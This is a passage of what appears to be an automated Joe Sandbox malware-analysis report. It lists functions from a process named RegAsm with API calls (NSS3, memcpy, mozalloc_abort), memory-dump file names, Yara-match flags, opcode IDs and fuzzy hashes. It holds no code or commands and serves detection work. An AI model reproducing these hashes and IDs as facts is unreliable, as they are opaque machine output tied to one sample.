                                                                                • Opcode Fuzzy Hash: f9589811858bd53b6f2c56ef5cb768d1ec6d44e1cf31d85bf6b84f01be8c7b91
                                                                                • Instruction Fuzzy Hash: 13613A70905288EACB14EBE5D556BDDBBB4AF19308F50417EE805736C2DB781B0CCBA6
                                                                                Function 6C924D10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C924D57
                                                                                • PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6C924DE6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorR_snprintf
                                                                                • String ID: %d.%d
                                                                                • API String ID: 2298970422-3954714993
                                                                                • Opcode ID: 5fc9e36e2c2854697794d8841b6095380e3b24212145f76c2399cd61467a9932
                                                                                • Instruction ID: e3fdef3fdfe640642cf3278fbaf1e9c558faf4499ca272db1e428be05799e217
                                                                                • Opcode Fuzzy Hash: 5fc9e36e2c2854697794d8841b6095380e3b24212145f76c2399cd61467a9932
                                                                                • Instruction Fuzzy Hash: 90310AB2E002186BEB109B64AC01BFF776CEF51308F050469ED559B785EB39E909CBA1
                                                                                Function 0040E048 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 0040E062
                                                                                  • Part of subcall function 0041E560: std::exception::exception.LIBCMT ref: 0041E575
                                                                                  • Part of subcall function 0041E560: __CxxThrowException@8.LIBCMT ref: 0041E58A
                                                                                  • Part of subcall function 0041E560: std::exception::exception.LIBCMT ref: 0041E59B
                                                                                  • Part of subcall function 0040DE51: std::_Xinvalid_argument.LIBCPMT ref: 0040DE62
                                                                                • memcpy.MSVCRT ref: 0040E0BD
                                                                                Strings
                                                                                • invalid string position, xrefs: 0040E05D
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throwmemcpy
                                                                                • String ID: invalid string position
                                                                                • API String ID: 214693668-1799206989
                                                                                • Opcode ID: adb162555bb1dc51adecccd48a928655473fd20a05b9e363fce7d2c458d50710
                                                                                • Instruction ID: b9813761b05a122dd8aed8326cf999b782d45421acb08efd83d9390538f341b4
                                                                                • Opcode Fuzzy Hash: adb162555bb1dc51adecccd48a928655473fd20a05b9e363fce7d2c458d50710
                                                                                • Instruction Fuzzy Hash: 1C112B31308224DBDB249E1A9C40A2AB3A5EB95714F100D3FF852AB3C1D7F9D850C79E
                                                                                Function 0040DFAF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Xinvalid_argumentmemcpystd::_
                                                                                • String ID: string too long
                                                                                • API String ID: 1835169507-2556327735
                                                                                • Opcode ID: a7804603839e34a47926d4d4e8eea39133707d68188460ae4548f68c22849222
                                                                                • Instruction ID: a8c71809997a943f8247e46865462385ee80d849e33b5082b4ef7bb8c1a6b5f3
                                                                                • Opcode Fuzzy Hash: a7804603839e34a47926d4d4e8eea39133707d68188460ae4548f68c22849222
                                                                                • Instruction Fuzzy Hash: 2411CB317006509BDB349F6EC940A6BB7A9EF41754710493FF443AB2C1CBBADC198799
                                                                                Function 6C7F3CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C7F3D19
                                                                                • mozalloc_abort.MOZGLUE(?), ref: 6C7F3D6C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650238110.000000006C7B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7B0000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650211449.000000006C7B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650456604.000000006C83E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650533178.000000006C842000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c7b0000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: _errnomozalloc_abort
                                                                                • String ID: d
                                                                                • API String ID: 3471241338-2564639436
                                                                                • Opcode ID: fe1ff99925f00082701d6fa08d5a4c1fbcc1bcd0276cc11f3c210a2167514f71
                                                                                • Instruction ID: 5487c9d79ff8acbd7a0a15677fe2e4ec205ff22101c3228d6b89627c9e336618
                                                                                • Opcode Fuzzy Hash: fe1ff99925f00082701d6fa08d5a4c1fbcc1bcd0276cc11f3c210a2167514f71
                                                                                • Instruction Fuzzy Hash: 4E110431E04688D7DB108BA9CD5A4EDB775EF86318B449229DC589B702EB30A985C3E1
                                                                                Function 0040DC98 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 0040DCAE
                                                                                  • Part of subcall function 0041E560: std::exception::exception.LIBCMT ref: 0041E575
                                                                                  • Part of subcall function 0041E560: __CxxThrowException@8.LIBCMT ref: 0041E58A
                                                                                  • Part of subcall function 0041E560: std::exception::exception.LIBCMT ref: 0041E59B
                                                                                • memmove.MSVCRT ref: 0040DCE7
                                                                                Strings
                                                                                • invalid string position, xrefs: 0040DCA9
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentmemmovestd::_
                                                                                • String ID: invalid string position
                                                                                • API String ID: 1659287814-1799206989
                                                                                • Opcode ID: 6c3c7ea44ad9e5e0a92ce9f69708ac908520c95cb6c982ad81dc5019ca06bff5
                                                                                • Instruction ID: 013243cbf8bd52bdbb76082f5a08148d0adace471495ead66214a40d62cc662f
                                                                                • Opcode Fuzzy Hash: 6c3c7ea44ad9e5e0a92ce9f69708ac908520c95cb6c982ad81dc5019ca06bff5
                                                                                • Instruction Fuzzy Hash: B701F9317042048BE3248E98DD8095BB7A6EF85710720493ED48297385DAB8FC4AD39C
                                                                                Function 6C930DB0 Relevance: 5.1, APIs: 4, Instructions: 97COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Value$calloc
                                                                                • String ID:
                                                                                • API String ID: 3339632435-0
                                                                                • Opcode ID: 51f0d8102a6d326c2dc98c1997613637e0c32fb78736c01e18086aca5111034e
                                                                                • Instruction ID: 01b790a73f07d21d85af17be92fb7758e7582f2aedd125bf4e358f083701d112
                                                                                • Opcode Fuzzy Hash: 51f0d8102a6d326c2dc98c1997613637e0c32fb78736c01e18086aca5111034e
                                                                                • Instruction Fuzzy Hash: 7D31B5B07447A58BDB245F7CC98426977B8BF06348F11B669D88DC7A91EB34C485CB82